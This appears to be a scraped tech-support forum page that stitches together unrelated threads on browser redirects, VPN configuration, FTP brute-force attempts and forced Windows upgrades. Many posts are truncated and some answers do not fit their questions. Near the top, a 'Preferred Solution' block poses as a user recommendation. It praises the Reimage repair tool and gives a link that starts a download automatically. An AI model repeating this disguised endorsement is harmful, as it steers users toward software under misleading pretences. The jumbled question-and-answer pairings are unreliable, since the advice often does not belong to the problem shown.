Being forced to different site

Question: Being forced to different site

Ok, this has now happened no rivals.com and when I was lookng at one article on espn.com. When the page loads it shows below it has finished loading the page, but show a white page, then quickly loads this dell search page. The address for the website that it could not find this time on rivals is: http://ad.yieldmanager.com/st%3Fad_type.

Here is a screenshot of the search page that I took a little over a month ago when I had the same problem. I stopped going to rivals.com where I normally had the problem so I never knew if it really went away or not. I went there actually once after I had run all the programs and had no problems that one time.

Preferred Solution: Being forced to different site

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

I don't know why it would possible only do this on a few pages, and Go The Power, this is the previous problem that I was having, where I was told to download and use all those programs.

Here is a screenshot of the search page that I took a little over a month ago when I had the same problem. I stopped going to rivals.com where I normally had the problem so I never knew if it really went away or not. I went there actually once after I had run all the programs and had no problems that one time.

Hello again

To me it sounds like you could still be infected:

I would recommend that you go here; read and follow the instructions very carefully; then, post all the requested logs and information; as instructed, to here. (Just click on the coloured links.)

Once done, please be patient, as the Security Team Analysts are usually very busy; one of them will answer your request as soon as they can.
Good luck

Please also remember DO NOT post your logs in this thread, please start a new thread here. (Just click on the coloured link.) and post the logs.

I have two networks that are connected to the internet, and i want to bridge them over VPN and i need to find which would be the best VPN Firewall Router to use.

My needs basicly are to have those 2 site conected togeter, plus the ability to connect outside of one of these sites, (user-2-site).

What would anyone here recomend?

Answer:Networking: VPN site-2-site and user-2-site

3com Secure Router

PERFECT for what you want to do! I use them at each of our branch locations and have the 3com VPN router here at corporate (allows 10 IPSEC VPN tunnels), the secure routers allow 2 of each connection. Basically, you would use a secure router at each place using IPSEC VPN tunnels to each, then, you can dialin to EITHER one using either a PPTP, L2TP or an IPSEC dialup connection (dials to the ip address of the router). Also has content filtering, firewall, etc... it's VERY nice for the price, you can find the secure routers for 149 or cheaper.

I have setup a Site-to-Site VPN using Sophos UTM at each end. I set up an Ubuntu VM as a WINS Server using Samba.

So far so good. VPN Works.

My problem is with the WINS Server. I have taken two Windows 10 computers and for both of them added the IP of the WINS server under Advanced TCP/IP Settings and changed NetBIOS to Enable NetBIOS over TCP/IP.

The results are close but not quite right. The two computers with the modified settings can now ping each other using computer name rather than IP. Other computers on each end of the VPN can not do that.

That said neither computer shows up in the Networks of the other. This is what I am trying to fix.

It appears that name resolution is working for the computers that check in with the WINS server but that the Windows 10 browsing service is not adding those computers to the network.

The LANs are 192.168.2.0/24 and 10.1.1.0/24 the WINS server is on 192.168.2.0/24 and it comes back as __MSBROWSE__ for that network. For 10.1.1.0/24 the computer that connects to the WINS server is showing __MSBROWSE__ when I check with nbtstat.

When I check services Computer Browser is running.

Can someone help me or at least point me in the right direction? This really shouldn't be this hard so I feel like I'm missing something obvious.

Answer:SAMBA WINS Server + IPsec SIte to Site VPN = Browsing Service Not Work

VPN will only work for outside the network, not meant for connections inside the network.

I'm about to ship my thinkpad p50 from the Philippines to the US using a forwarder. My p50's touchpad and track pad stopped working. The keyboard is still working but the trackpoint, the trackpad, and the mouse buttons are not working. Answer:do lenovo allow on site repairs at forwarder's/courtier's site (eg. USPS, FedEx, DHL)

I have never heard of any courier that had that sort of facility

Hello, I am trying to change the font size of a page on my site. I connect to the site with file zilla using the following steps:1.) I open file zilla.2.) then i type the host name (blablabla.com) the username (*********) and the password (********) and the port (****) then i click quick connect.3.) this now connects and it does let me see all the files. i get access and ability to change on the right side (the site side).my two main questions now are :1.) How do i make it show when i access the site because it is not (even if i delete the whole site name folder the site is still there)2.) Do i have to set up the FILE> "SITE MANAGER" with the user information too..... even though i can see and change the files on the right side (the site side) and it even though it connects. (Is setting up the "site manager" required in order to finalize changes or something.please help   , thanks

Answer:file zilla ...site wont change...files do...site doesnt

Hi, I use FileZilla too but i'm not sure what you are talking about...Any time you change or upload files to your server the files will automatically be time and date stamped. But I think you are talking about something else...?Could you try and re-describe your question please? It would be a good idea to add your server and connection details to the 'Site Manager' as this will save you some time if you frequently update your website.

Dear Friend,
I am Anil from India. I have recently joined the forum after struggling for a week to stablise my unstable PC. I used to have some Anti Virus software on my pc before few years. But since last few years I was not having any AV software as this PC was not being used for surfing etc.
Since I started to use it again for surfing, downloading etc., I wanted to instal avast AV software. I installed it from some recent installer file with me. But when it tried to update the virus database, I got the message that "can't connect to server". Then I tried to open avast.com. But I again got the error message "The page cannot be displayed". Then I uninstalled the avast and tried to open other antivirus sites like norton, mcafee, avg etc., but all failed.
Then I tried to update my system using automatoc update utility. But again failed. microsoft.com also failed to open.
I use GPRS connection through cellular connection to browse the network.
Now I have downloaded and installed Hijack This.

Hi Guys,

I've done a fair amount of googling before referring myself to W10 Forums.. I hope this helps someone else in the process. Since rolling out Windows 10 we've noticed users are having difficulty accessing their personal user data drives, via File Explorer. Let me make a scenario which is understandable.

In Site 1 (HQ), we can connect to the file server (e.g access 1FS without any issues- Where user data is stored)
In the remote site (Site 2), we can do the same (e.g 2FS)

At our HQ, when running Windows 7, we are able to File Explore to 2FS but since the upgrade we're unable to. This occurs both ways.

We can ping our servers, and remote desktop.

Server infrastructure:
VMWare ESX 5
File servers in question are Windows Server 2008
ONLY Windows server 2008 R2 servers have the issue, (2008 Standard edition is fine) all patches have been applied via WSUS.

Can anybody shed any light on this?

Thanks in advance,

IT Apprentice

I may not have this under the correct section and please keep in mind that I am not a programmer but here goes.

I am trying to add a hyperlink in Outlook 2007 signature file that will open a child site, but the child site seems to need some personalized information in the cache that comes from opening a parent site first:

Parent site: http://www.mywildtree.com/chad/
Child Site: http://www.mywildtree.com/shop/catalog.aspx

When the child site is opened directly (without opening parent first) it loads forever. The parent site does not require any authenication it just has to be opened first and then the child site operates correctly.

Is there a simple way to have one hyperlink either a) open two sites one after the other in the same window? or b) open the childsite with a parent site dependancy (tag?, bookmark?) on the hyperlink?

I have been on google searching all afternoon and haven't had any luck yet so any help is appreciated.

Thank you

Answer:Hyperlink syntax to open a parent site and then child site

Welcome to Seven Forums chadseeg. The Shop Now link shows as actually being http://www.mywildtree.com/shop/preshop.aspx, and this appears to redirect to http://www.mywildtree.com/shop/catalog.aspx.

Firefox blames the redirection

It looks like the script on the page is written to specifically prevent going directly to the shopping catalog without going through the home page. I'm not a webmaster, so I am unsure if this is intentional or not. A Guy

I might have 50 web site tabs and am looking at one of them. All of a sudden, another web site starts with a voice and I can't determine which tab it's on. Trying to listen to two sites (or more) is ridiculous. How can I find the offending web site?

Also, some web sites will present and audio "story" which cannot be paused or stopped (unless you close the page). Is there a way to fix this?

Thank you.......

Answer:How find web site that is making voice sounds when site not in focus

Open Volume Mixer (right click Volume icon in notification area) and mute the whichever you want. The pages with sound will have green volume bar moving up and down.

Hello all,

Good to join this forum

Anyway, Please can someone support me regarding connecting a Windows Server 2008 standard that needs to connect to another Windows server in another country outside of UK (Site B). The ports 1433 and 3030 are also open in the firewall and also the Draytek 2830n router, therefore I can see the ports open via yougetsignal.com. We have 1 public (Static) IP address from BT that is already in the Draytek router on Site A (UK).

How is the simplest or easiest way to connect these 2 Window servers so a management program that uses MySQL Database server can talk to the Site B server or vice-versa) Both sites have a Public IP address.

Can this be done by the WIndows firewall inbound rules / outbound rules where the port 1433 is set. There is an option to enter a Remote IP address under 'scope' which I assume is the Site B's public IP address within the inbound firewall properties.

The other way is the VPN on the Draytek 2830n. There is an option for Lan to Lan using IPSec but not sure the best settings for Dial-out or Dial-in. There is usernames and passwords that not sure of including the Remote gateway or Remote IP to use

We have 2 different routers on Site A and Site B are not the same.

Thanks Guys

Hi, I'd like to know what to do on my computer if I would like to redirect a link on a website (let's call it 'A') to another website (let's call it 'B')I know that I could just modify the file "hosts" on the windows folder, adding the dns of the 'B website' and writing the url of the 'A website', but I saw it doesn't work if the url starts with "https://...".[Note that the 'A website' is any general website, that means that is not mine, and that the url of the 'B website' it doesn't start with 'https' but with 'http'.]Is there any way to do it?Thanks.

Hi, I'm a complete network newb, but am helping out a Montessori school with their issues. Hopefully someone can help.
Site A has the main WAN link coming in to a Cisco 1841 router, then going to a Sonicwall appliance, then to a 24 port unmanaged switch.
There is also a point to point link to site B. This has another Cisco 1841 router on each end of the link. At site A, it's also plugged into the 24 port switch, and plugged into another 24 port switch at site B. There is a DC with DNS and DHCP at site A, and a DHCP server at Site B. Site A's IP achema is 192.168.1.x, and site B is 192.168.2.x, with subnet masks of 255.255.255.0. The circuit sides of the point to point connection is 10.0.0.1 & 2.
The problem they've been having for the last month or so is that the connection at site B would drop all together, or be very slow and sporadic. Yesterday, I tried downloading a 4mb file from the internet, and couldn't get the whole thing, even after trying for an hour, it kept timing out.
Downloading the same file from site A, I was done in 20 seconds.

Here's the wierd part. If I do a tracert from site A to site B's server, it sometimes works, meaning it'll trace in a couple hops to the server. When it doesn't, it tries to route out over the internet, with the first hop being a 162.42 address, which is the service provider.

Century Link says the point-to-point T1 circuit is fine, but am reaching out to see if anyone can give me a hand... Read more

Hey everyone,

I have a customer with two offices, one in Chicago and the other in New York, and each one has dual WAN connections currently. Their current firewalls in use can only do site to site VPN with dual WANs in failover mode, not load balancing.

We are looking to implement a new firewall VPN router at each site to be able to aggregate these dual WAN lines (about 50Mbps and 70Mbps connections on each end) to combine the bandwidth into one massive site to site VPN link. If one WAN goes down, the line just downsizes seamlessly onto one WAN link with no interference.

The only product on the market we have been able to find so far at a decent price is made by a company called Peplink, specifically their 710 model firewall:

http://www.peplink.com/products/balance/model-comparison/

We spoke to their reps and found that they have tech that can do everything we are looking for. We had a chat with Barracuda support too and they seem to think that a combo of BWB230a1 with a BFWX300a1 would get this done, but we would not have uplink failover on the WAN connections which is a real bummer. Plus the fact that they say we need two boxes really knocks their solution below the nice single box option from Peplink.

Question is: Does anyone have any other suggestions on hardware? We DONT want to go the ASA route from Cisco as both our staff and the IT staff at the customer do not have the knowledge of Cisco command line for administration - the solution has to have a GU... Read more

Answer:Best dual WAN load balancing + failover site to site VPN firewall?

Stay far away from Barracuda Link Balancers. They are a pile of junk. We had 12meg Bonded T1, and 100Meg Comcast Business Class. If the Comcast ever went out for whatever reason, the T1 should have picked up, but there tech support could never figure out why it wasn't working. The Comcast when it did work, was only putting out 25Mbps through them, but when direct to modem, would give 50Mbps+. They also eat up a static IP just for themselves.

If you want site to site vpn + firewall in one, I have had great luck with the Cisco Meraki MX90. Dual WAN is super easy to setup, and VPN is even easier, with included support for VPN with non-meraki devices. It has support for link aggregation, though I don't know if it supports LAG over VPN. You could call their number and ask a few questions to find out though.

I have a 12U openframe post server rack that I want to move from a building in one city to a building in another. The rack can hold up to 596.7 lbs and the total weight of the equipment has been calculated to about 350 lbs, but what is the best way to tranport it. Why can't I use a 15' Uhaul truck with a built-in ramp if I ratchet strap it on one side with two parallel straps and to the back of the inside of the box truck with two straps parallel even if the rails to ratchet strap around are 3' or waste high off the ground and the height of the server rack is 25.9 or slightly over 2' off the floor or ground? Why do I have to unrack the equipment to transport the equipment considering the above and that the rack has wheels? Also isnt't the equipment safer while mounted to the rack. Why heck is someone insisting that we use their mini van and ramps to get it up into that when they don't seem to know how we'll get it out once we get it to the other site?

Question: Forced Log-off

We have NT 4.0 Servers and Win 9.x clients. Is there a way to force a PC to logoff from the server, after 15 minutes of inactivity? If NT can't do it, are there other applications that may accomplish this?

Answer:Forced Log-off

Greetings

What do you mean by "logoff the server"? Do you want the Win9x machines to shut down or do you want them to act like the user has selectec "logoff Username" from the start bar?

What are you actually trying to achieve? Are you trying to get it so that when users go home at night, the machines are not logged onto the domain, and another person can not use their machine to maliciously delete files etc off the severs?

Cheers

(I am doing research for a future system with no money for R&D so thanks in advance for any help or advice you might have)

We have a few data networks and one video teleconferencing network divided into vlans and i'm looking for an IP based solution to replace our ATM path.

My superiors are worried mostly about QoS which is why they are still stuck with ATM.

My question is since i have a dedicated T1 satellite shot to only one network (static routing) could i just take out the ATM switches and expose our cisco 3700 series router and give priority of between 400 and 500 kbps directly to the video connection when needed (making or receiving a call)

Are there any pieces of equipment that are good for QoS of different networks out one dedicated pipe or can the QoS functions inside the cisco router be good enough for our purposes.

Also, is there anything IPv6 has brought to the table yet that could solve my problems.

All i have to do is coordinate how the information gets to one location from our site and they can do whatever they need to direct traffic on their end (data or video trafficed to different locations over).

I have a client with 3 remote offices. Lets call them A, B and C. These offices are tied together in a "mesh" fashion with site to site IPSec VPN tunnels on ASA 5510's. Everything there works fine. Site A is 10.0.1.0/24, Site B is 192.168.1.0/24 and site C is 192.168.200.0/24

They have about 30 remote "field" users that connect into office "A" via Cisco IPSec VPN client and get a 172.16.1.0/24 address.

Recently they installed a couple servers at site B and C that these remote access users require access to while connected to the remote VPN to site "A"

Is it possible to somehow route or allow traffic from the remote access VPN users over the site to site VPN's?

If so, any input on how to configure this? Just a basic abstract would help. Again they are using a single ASA at each site to complete their topology.

Any input is greatly appreciated.

Answer:Routing Traffic from Remote Access VPN's over Site to Site VPN's

Probably need to set a route at the remote sites for the VPN pool subnet. Also, would need to add the remote site networks to the tunnel list for the remote VPN

Didn't know how to title this issue...basically, here's the deal: I have a school web site, on [email protected], which has a maximum of 10mb on the site. This is a constant battle trying to keep it under the 10 mgs, with all the photos and whatnot I like to put up there. I was thinking that I still have another three or four sites on my account; why don't I set up one site which is just the images, and link it to the other site. Wouldn't it be transparent? I mean, if I set up a hyperlink on the main site, wouldn't visitors just cruise back and forth at will without any hassle? And that way, I'd have much more space for images.

Please advise...it seems too easy...am I missing something?

Thanks!

p.s. I use front page 2002 from office xp suite (professional )

Answer:thinking of setting up web site just for images to support another site

I don't think you're missing anything. This is common practice. Most of the images on this page came from another site. Ads almost always do. There's nothing that says that the image links in your html can't load images from elsewhere. The ability to bring many disparate objects from various sources together on one web page is the reason html was designed the way it was.

Sounds like you have a good solution to your problem.

I run a music website, and I am finding that people are using my bandwidth by linking the files from my site to their site (Does that make any sense?). It want to stop this, because it's wasting my money. I would like it so if they try to link a file it says "Linking file from x site" or something like that (geocities does this with images). I know its possible just not sure how.

Hi all,

This problem is with all browsers. With FireFox & IE, I get the error message "The server at [name of site] is taking too long to respond?" This problem is at only 1 site; all other sites are great. Had no problems last week and had no problem getting into it using Opera until yesterday. I've been doing some research and lots of people have the same problem with one site only. I haven't found any solutions yet.

My internet goes through a server & router. I thought for sure it was my pc but I get the same problem on my iTouch with that one site. At home, I have no problem with my pc & iTouch. Anyone have any ideas?

I even tried Safari and no luck. This is all from work. That site opens no problem from home. Must be something in the server? Why only one site??? It's not a bad site or anything like that, it's just a private community private forum like this one here.

Running Windows XP

Thanks in advance.

so, you have corp office on a 10.10.0.0/16 network, you have a branch office on a 172.16.254.0/24 network, and that branch office has an interface on the firewall configured to talk to a separate vendors devices on a 192.168.100.0/24 network. you setup static NAT to basically NAT a device on the 192 network to an IP on the 172 network. you can ping and talk to the devices just fine if you are at the branch office. however, pinging the device from the corp office does not work.

do i have to allow the 192 traffic through the tunnel? in my mind the answer is no, because the NAT translation is happening at the branch office and sending the traffic along. so just because the tunnel is configured to only allow 10.10.0.0/16 <-> 172.16.254.0/24 it shouldn't be dropping the 192 traffic because the NAT has changed the header ... ?

Answer:site to site VPN connection, allowed traffic, and NAT issue

Questions.

1. Do you see the traffic getting dropped? If so where?
2. Does the device on the 192.168.100.0 network have a return route to your corp network?

Hi all,

This problem is with all browsers so hope it's ok to post this here? If not, please move this thread.

Thanks in advance.

(i am running check point 4.1 firewall-1 and i am trying to establish a site-to-site vpn with a cisco 3000 vpn concentrator. we have verified over and over that all our settings are configured correctly but we still cannot connect.

in my logs, i see the phase 1 but we never get to phase 2 completion. the error message on my end is 'invalid cookie'. on the cisco send the error message is 'QM FSM error'. both of us tried to contact support people for our products but we keep getting the same response, make sure your timeout settings are the same.

has anyone encountered a similar problem?

i am really hoping to resolve this issue because i'd prefer a site-to-site vpn solution over installing cisco vpn client software on each machine.

thank you very much in advance.)

Hi allI've just registered here in the hopes that someone can help me with my problem. I've exhausted every option I can think of to try and fix this problem but I'm still having issues.I am currently using FireFox 8.0 and I am using Norton 360 Version 5.0. My operating system is Windows Vista Home Premium.I keep getting a Malicious Web Site Blocked page pop up just about every time I click on anything. Then Norton takes me to this page when I click on detailed report:Pagebut doesn't explain to me what I can do to resolve this problem. It's very annoying. I can't do anything without this popping up. I've run computer scans etc etc but nothing gets rid of whatever the hell this is. I don't even know what Widdit is or how it's affecting me? I've never been anywhere called Widdit?First I ran just a full computer scan to see if it picked up anything, but nothing came up bar a few tracking cookies. So then I went to the Norton Community forums for more help and they've suggested downloading a Anti-Malware program, but that picked up nothing on any scans. I then ran Nortons Power Eraser as suggested as well but that picked up nothing either.I'm still getting this Malicious Web Site Blocked page pop up a lot, just when I'm browsing through sites I normally go to. I don't know what's going on at all. I've tried everything I can think of and any help would be much appreciated!Thank you!

Hello, let's see if these will show us somethings. Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!Be sure to download TDSSKiller.exe (2.6.11.0) from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.Double-click on TDSSKiller.exe to run the tool for known TDSS variants.

Does this site assume that I am logged onto a vista computer?

I registered as a x64 Vista Ultimate user. But for much of the day I am not on that machine. Should I still be able to view the site tutorials? Because the tutorials do not play on this XP machine.

Doug

Answer:Site forum site vista tutorials do not play

Hello Doug, and welcome to Vista Forums.

I'm not certain that I understand what you mean. Do you mean that the tutorials will not display, or that the flash videos in the tutorials will not play on XP? If you mean the flash videos will not play, then do you have Adobe Flash Player installed on the XP computer?

Hope this helps for now,

Well my internet connection was acting funny today. I was lagging out on my games and didn't know what it was. So, I turned off all my open ports and everything worked fine. I got into digging through my server logs and it turns out my FTP server was being brute forced. Is there any way to report this activity to the person's ISP that was doing it? I remember seeing a way to retrieve the info based on an IP address but I just don't remember how right now.

After I report that, I'd like to know if anyone knows of a good and secure free FTP server that I can tweak based on the following things:
blocking IPs permanently
blocking IPs based on the number of failed attempts

Also, is there any way to secure the rest of my system like this? I have one computer I use to forward ports to (not a DMZ) sitting behind a Linksys WRT54GS. I think its pretty secure but I honestly am second guessing myself after this attack.

Anyways, if anyone can help me out, the offending IPs are:
65.95.107.159
219.136.187.231

I've kept all the log files in case they need to be forwarded to the ISPs.

I'd also like to ask another question while I'm at it. I've tried out nmap to see what ports my server has open as well as a couple others. The ports come up as being "open", "closed" or "filtered". All my ports are just open. Is there any difference between these distinctions? Can I change my ports to some other ... Read more

Answer:Getting brute forced

Some genius has been trying to brute force accounts through SSH on my personal server. It's random IPs tried on the root account and random named accounts. Too bad you can't SSH as root . All of the other accounts the person is trying to brute force don't exist.

I wouldn't worry about it. Brute forcing across the internet is time consuming and practically never works. The only thing I ever look for are undocumented remote exploits. MITM (man in the middle) attacks are also terribly difficult to do. So is line sniffing.

Question: Forced 8.1 upgrade

Howdy folks, hope everyone is doing well.

A couple of weeks ago I suddenly got a countdown timer to Win 8.1 upgrade. I didn't choose to upgrade and there was no way to abort that I could find. I was due a free upgrade on this laptop but hadn't taken advantage of it as I was just fine with Windows 8 & feared having problems with the upgrade.

Since the forced upgrade I"m having longer shut down and start up times, longer waking from hibernation, problems with the mouse, and some other assorted weirdness.

So why & how was this upgrade forced on me? Are there some tweaks that would help with the problems I'm having?

Answer:Forced 8.1 upgrade

I would suggest upgrading your hardware drivers, if Win 8.1 drivers are available. Toshiba support web site should have the new drivers for you.

Question: Forced Shutdown

Everytime I go to Restart or Shutdown I am getting a forced showdown screen before Win 7 shutsdown. This is with all processes that I can control closed.

Here is what was running on my last shutdown:

I don't see anything out of the ordinary in that list to cause a forced shutdown. When I get the forced shutdown, I have tried to pause to see what process is causing the forced shutdown, but it never pauses and is gone so fast I can not read the process name.

If anyone has any ideas I would appreciate some help.

Go to start and type in msconfig and hit enter. Go to the startup tab and disable everything except your antivirus. Youwill get that message again when you reboot for the first time after you click restart now in msconfig. Try rebooting after the first reboot since you ran msconfig. This should improve computer performance and keep Windows from showing that message. If that dosn't help, adjust the wait to kill timeout setting as shown here: Shut Down -Speed Up

Question: Forced Uninstall

I have a couple of part programmes on my PC which will not uninstall, despite being on the Uninstall lists of Control Panel, CCleaner and Wise Care. It really annoys me and I suspect that they might be causing problems.

I note on the Wise Care system I get two uninstall options 1. Safe Uninstall and 2. Forced Uninstall

Safe Uninstall does not work (Uninstaller\unins000.msg missing appears when I try it). There is clearly quite a difference between the two types of uninstall and I just need to know if it is safe to go ahead and force the issue. What sort of problems might arise if I do go ahead?

It's probably an over-temperature situation forcing a shutdown. Hard to say more w/o knowing the exact make and model. Some of them had problems which are fixed by bios and monitor software updates. Does it game well at the Hockey Rink?

I recently downloaded zSuite (if you don't already know it's essentially a modding program for the Zune) and I needed to turn off UAC to run it. So I shut it off and rebooted my computer and for some reason check disk (CHKDSK) starts to run. Whatever, I just let it run. It took like 20 minutes deleting and replacing random files before it finished and booted up. I put in my password and tried to log in but it wasn't able to and logged me into a temporary profile instead. I fiddled around with it and eventually just used system restore back to the recommended point in time which fixed the problem, but now whenever I run any program at all I have to right click and go down to "run as administrator" if I just double click it says " program is already running, but is not responding please close the task or reboot" or something similar depending on the program. I have rebooted several times, to no avail, and I am at a total loss to explain what exactly is going on.

I have not taken the plunge yet and upgraded from win 7.

The biggest reason for me is forced updates, and mostly worrying about forced updates from nvidia drivers.

Before I upgrade is there a hidden way in the registry to turn off forced updates?
what happens if you run into a bad nvidia driver update can you downgrade that driver manually but then will it auto update?

Answer:win 10 forced updates

You can go into Control Panel\Hardware and Sound\Devices and Printers, right click your computer icon and click Device installation settings, then choose to never install drivers from Windows Update.

If you are running older hardware which hasn't had recent driver updates I would recommend not doing this. Some updated drivers are only available through Windows Update. I've seen both Intel and AMD video drivers, for old hardware, delivered through Windows Update that are not available to download otherwise.

Hi Pestyone What are you afraid of right now? You're afraid that Microsoft makes you upgrade, but upgrade to what? Windows 10? This isn't the case right now and it won't be until at least 3 months. Plus, I really doubt that they'll force an upgrade to Windows 10 via a silent update, this would be unethical and a lot of users would complain about it.

Question: Forced shutdown

Hi everyone,

I have an

Inspiron 1420 Dell computer
Windows Vista
32-bit operating system
2 gb RAM
Intel core 2 duo CPU @ 1.80 GHz

I am on the Dell reccomended power plan, which indicates equality between the use of battery and performance.

So here's my problem. I will leave my computer (plugged in or not doesn't seem to matter) alone for about 15-20 minutes. When I come back, the screen is black, and when I move the mouse, one of two things happens.

1. It stays black and I am forced to shutdown by holding down the power button
2. It goes back to whatever I was working on but then freezes- I can move the mouse around bu can't click on anything and am again forced to shutdown.

Anyone have any experience with this or know what to do? I've had some blue screens before as well.. I don't know if that is related or not.
I have absolutely no clue when it comes to computers... so I would appreciate any help.

Thanks!

Oh I wanted to add that I have tried ctrl alt delete, and that does not have any effect

Try new video drivers. I prefer the one's from the manufacturer of the video chipset (ATI, nVidia, Intel, etc) over the one's from Dell.

I've had a Windows 8 PC for some time now. Everything works fine on it. I get the nag to upgrade to 8.1 every now and then, but I always dismiss it. Today, when I woke up the computer, it told me the update was ready but I had to reboot. My only choice was to postpone the reboot. I didn't really want to update it because, as I said, it was working fine. It gets along with my home network, etc. I went ahead and told it to "reboot now" since any other option was just putting off the inevitable.

It's at 78% setting up now. What can I expect?

My concern is that I also have a laptop that I use more often that also only has Windows 8. I get the nag to upgrade on it as well. I'm concerned I'm going to turn it on one morning and be forced to upgrade it as well.

Answer:PC just FORCED Windows 8.1. Now What?

If Windows Update started the download and install then the required previous updates had been done, shouldn't be a big problem. I've done a Desktop and a Notebook without issues.

By the way, I think there was something about the Update to 8.1 would be automatically pushed if one hadn't gotten it yet.

This morning I have the dreaded 'Upgrade to W10' showing in Windows Update. I HAVE DONE NOTHING TO INVITE THIS. I never accepted the invitation for W10 and used Shawns reg tweak to remove the GWX icon a few months ago.

Yesterday I did install KB3083711 (update to Windows Update) BUT NOT KB3035583 which was another W10 compatibility update. Has KB3083711 some other hidden function ?

MICROSOFT. THIS IS NOT ACCEPTABLE. I do not want W10 on this PC. This PC has not been able to install W10. Dell say this PC is not suitable for W10.

Whinging here won't achieve anything, I know that, but I am seriously considering rolling back to way before all this W10 stuff started and turning OFF Windows Update.

I WANT THE W8.1 THAT I PAID FOR OUT OF MY OWN MONEY.

W10 makes me feel that the PC isn't mine anymore... I have no control over what Microsoft are foisting on me.

I would have liked to have seen an opt out update be issued that would take users like myself out of the W10 loop.

EDIT... One important bit of info. I have Windows Update set to notify only. Seems that was no barrier in this case.

Answer:Upgrade to W10 FORCED UPON ME.

You should let it go through and then get a lawyer and sue them for loss of productive time loss of data, emotional pain and what ever else comes to mind. No should mean NO! Maybe hacking laws or what ever could apply, because they are making unwanted changes.

Question: Forced slowdown?

Hi,

For my first post this may be a bit silly; not an emergency, just an oddity.

Seems like every so often (as in just now) my system starts to run slower and slower (it had been doing so for several hours today and I once again rebooted). Killing processes doesn't help and eventually I have to reboot. Windows then installs updates and all is well until the next time.
As far as I can tell this is always when there are updates that need to be installed. Seems as if the slowdown is forced on the system so that there will be a reboot. This is a real PITA if/when I am in the middle of something that takes a lot of concentration
As I say, it's just happened again. After a reboot (and updates installed), all is well.

Anyone else see this? I don't think I am being paranoid - if that means anything.

At the point I rebooted only 2+Gb/8Gb of memory were is use, but cursor movement was really slow - almost unusable.

I am running Win7 Home edition SP1 64bit. I can provide full specs, but that doesn't seem to be the issue.

I scan with Malwarebytes and Spybot S&D daily and use AVG for the rest of my security, so I think my system is clean.

Any thoughts?

Repeated attempts are being made to install Win 109 on my Win 7 pc.What is going on and how do I permanently stop this happening.Attempt always happens at boot up and show as a failed upgrade in Windows Update.

Answer:Forced Installation of Win 10

Second attempt to post this.
This is a known and widespread problem. Assuming you are not attempting to upgrade to W10 then uninstall update 3035583 and reboot. When that update is offered again just hide it - you can always restore the 3035583 update later if you wish to install W10 that way. It provides the GWX exe and bits (and that white window in the tray I think).

Question: Forced Shutdowns

I am having a problem with a popup window that says that I scheduled/requested a system shutdown on my computer no matter what I am doing. It counts down from 30 seconds and then forces windows to shutdown. This happens regardless of what applications I'm running, sometimes 2-3 times a day and sometimes every few days. The computer also seems to be running slower, especially when trying to load webpages, but that may be due to the fact the computer is 5 years old...

Question: Forced Reboot

Windows 7.
Numerous times I have tried to reboot my computer, because it?s running slow, or sluggish. When I close all open files, and try to reboot, I get message saying something is running, do you want to force the program to shut down.
How can I find out what is running?
After reboot the computer runs faster.

Answer:Forced Reboot

Check task manager and view processes...When asking you to force shut down there is a list behind it saying waiting for program(s) services to stop:
Check if there is any programs in the list and end its process in the task manager....
If you don't see anything, just wait for about 5 minutes.
If that didn't work, force shut down and remove all crap software from your computer.
REDUCE software killing process timeout:
Go to desktop--->Right click--->New--->Shortcut--->Type this:
Code:
shutdown.exe -s -t 00 -f
---->Next-->finish.
Now launch it.
#2nd way:
+ R -->Type Regedit.exe --->Enter---> UAC Prompt click yes---->Keep expanding this path:
Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Should look like this:

I have auto updates turned off and yet I keep getting pop-ups to update to 8.1. Now I've finally gotten the one that doesn't give me an option to say no. How do I stop 8.1 from being forced on me?And for those who think I'm out of my mind for not wanting 8.1, I can't upgrade to it because it causes problems that no one seems to know how to fix (unexplained low resolution in certain places and significant speed decrease). I'm stuck with 8.

Answer:How to keep from being forced to update to 8.1?

Quote I'm stuck with 8.You said it. MS does not want to support windows 8. The objective now is to push Windows 8.1 until the next windows version is ready. That has been reported earlier. Here is yet another report that confirms the fact.Microsoft stops selling Windows 7 versions, Windows 8 QuoteWindows 8 is also no longer available at retail from Microsoft, as the Redmond-based giant just wants it to go away at this pointPut another way, 8 and 8.1 are effectively two different systems.IMHO the best  you can do is find all your install DVD/CDs and backup all your stuff and prepare to a do a clean install of version 8.1 and live with it. EDIT: If you are a MSN member, you might get a free 90 days version of 8.1 and maybe install it again after the 90 days are up. That would get you into the next year and maybe then MS will have some kind of special offer.

Question: Forced into Domain

I have a new computer with a fresh install of Win 7 Pro, 64-bit. The computer properties tells me I'm not in a domain, just a workgroup, but when I try to login to another computer, it tells me I'm in the domain LAPTOP. (LAPTOP is the name of my computer.) Then, it doesn't allow me to change my domain so I cannot log into the other computer because it is on a domain and I must log into that domain. I have tried domain\userid, but that doesn't work because it insists I'm in the domain LAPTOP.

FYI: I have also changed the properties from 'computer on a business network' to 'home computer--not on network', but it doesn't stick. It just resets to 'computer on a business network'. I'm pretty certain these issues are related.

This seems like a Windows bug. It needs to be fixed ASAP. I need to be able to access other computers. I have never had/do not have this problem with other machines.

I've been told that a fresh install of Windows will fix this problem, but as this *is* a fresh install, I doubt it will work, and I don't want to spend hours backing up and reinstalling the same bug.

Can anyone recommend anything??

Answer:Forced into Domain

I have the same problem.
My Win 7 laptop is set up for "workgroup," which is the network name of other computers on my LAN.
When I try to connect, Win 7 sees the other computers, but selecting one, I get that popup that says at the top "Network Password." Then lower, fill ins for the user name on the computer I'm trying to connect to and the next line: password for the user I'm trying to connect to.
Below that it tells me I am a member of a domain, that has my laptop's name.
But the Laptop is set up to be a member of the "workgroup," not a domain.

So, no log in to the other systems is working. A domain computer won't be able to connect to a work group. Even if Win 7 telling me I belong to a domain is incorrect, any user name and password I enter for the computer I'm trying to connect with does not work. Another popup comes on asking me to enter the network password.

i also tried entering the password of the LAN, thinking that might solve it but it didn't.
and I tried entering the name of the user, with just the user name, as well a username using it's complete location on the network: \\(computer name)\(user name).

Nothing works and I can't connect to other compturers on the LAN.
And as this thread say's, Win 7 is saying I'm a member of a domain.

So, same problem here.
Oh, I also set up user accounts on the Win 7 computer with the same name and password as on the other computers in the LAN--but that didn't do any good, either.

